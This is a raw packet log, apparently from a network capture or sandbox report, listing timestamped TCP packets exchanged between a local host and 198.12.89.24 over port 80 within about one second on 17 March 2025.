Mar 17, 2025 01:18:59.827683926 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.827697039 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.827708006 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.827718973 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.827728033 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.827739954 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.827749014 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.827769041 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.827781916 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.827857971 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.827869892 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.827881098 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.827892065 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.827898979 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.827903986 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.827915907 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.827924967 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.827929020 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.827955008 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.827970982 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828041077 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828052998 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828063011 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828073025 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828088045 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828099012 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828109026 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828119993 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828125000 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828130960 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828141928 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828145981 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828154087 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828166008 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828174114 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828183889 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828193903 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828197002 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828205109 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828216076 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828229904 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828233004 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828244925 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828244925 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828257084 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828274965 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828313112 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828383923 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828396082 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828407049 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828417063 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828428030 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828435898 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828438997 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828450918 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828454018 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828464985 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828473091 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828478098 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828499079 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828521013 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828589916 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828600883 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828614950 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828624964 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828634024 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828635931 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828648090 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828659058 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828672886 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828679085 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828686953 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828697920 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828705072 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828708887 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828730106 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828741074 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828746080 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828752995 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828763962 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828768015 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828775883 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828787088 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828798056 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828836918 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828836918 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828852892 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828895092 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828917027 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828927994 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828931093 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828939915 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828949928 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828954935 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828962088 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828973055 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828973055 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828983068 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.828984976 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.828999996 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.829030037 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.829036951 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.829042912 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.829054117 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.829065084 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.829076052 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.829082012 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.829087019 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.829097033 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.829097986 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.829121113 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.829130888 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.829138041 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.829138994 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.829153061 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.829174042 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.829197884 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.914998055 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915029049 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915047884 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915060997 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915071964 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915082932 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915092945 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915111065 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915113926 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915122986 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915136099 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915147066 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915165901 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915168047 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915178061 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915189028 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915193081 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915205002 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915216923 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915224075 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915244102 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915257931 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915271997 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915281057 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915293932 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915297031 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915312052 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915324926 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915324926 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915333033 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915345907 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915345907 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915378094 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915404081 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915409088 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915425062 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915436029 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915447950 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915460110 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915472031 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915483952 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915496111 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915498972 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915515900 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915527105 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915529966 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915546894 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915555000 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915560007 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915571928 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915574074 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915586948 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915606022 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915633917 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915646076 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915663958 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915676117 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915687084 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915704966 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915712118 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915726900 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915740013 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915745020 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915751934 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915765047 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915769100 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915786982 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915812016 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915827990 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915839911 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915852070 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915860891 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915869951 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915874004 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915884972 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915904999 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915916920 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915920973 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915930033 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915941954 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915945053 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915971041 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915972948 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915986061 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.915997982 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.915998936 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916023016 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916054010 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916054964 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916068077 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916085958 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916095018 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916099072 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916111946 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916112900 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916132927 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916156054 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916256905 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916269064 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916279078 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916290045 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916301966 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916315079 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916323900 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916327953 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916340113 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916349888 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916361094 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916369915 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916380882 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916388988 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916393995 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916405916 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916419983 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916426897 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916440964 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916441917 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916451931 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916464090 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916476011 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916481018 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916497946 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916520119 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916537046 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916549921 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916560888 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916572094 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916577101 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916585922 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916591883 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916625977 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916630030 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916641951 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916660070 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916671991 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916678905 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916685104 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916697025 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916702986 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916728973 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916752100 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916759968 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916771889 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916781902 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916794062 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916810989 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916837931 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916882038 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916893005 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916903973 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916913986 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916922092 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916925907 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916937113 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916946888 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916958094 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.916980028 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916980028 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.916994095 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.917011976 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.917071104 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.917089939 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.917100906 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.917113066 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.917119980 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.917128086 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.917140961 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.917151928 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.917155027 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.917165041 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.917170048 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.917177916 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.917190075 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.917191982 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.917201996 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.917221069 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.917228937 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.917257071 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.003079891 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003112078 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003165007 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003175974 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003186941 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003205061 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003213882 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003226995 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.003227949 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003242970 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003256083 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003268003 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003290892 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003293037 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.003310919 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003323078 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.003331900 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003343105 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003349066 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003354073 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003370047 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.003370047 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.003371954 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003385067 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003396034 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.003403902 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003417969 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003428936 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003433943 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.003439903 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003453016 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.003459930 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003470898 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003482103 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003482103 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.003493071 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003504992 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003509998 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.003530025 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.003542900 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.003715038 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003726006 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003737926 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003750086 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.003758907 CET	80	49681	198.12.89.24	192.168.2.7
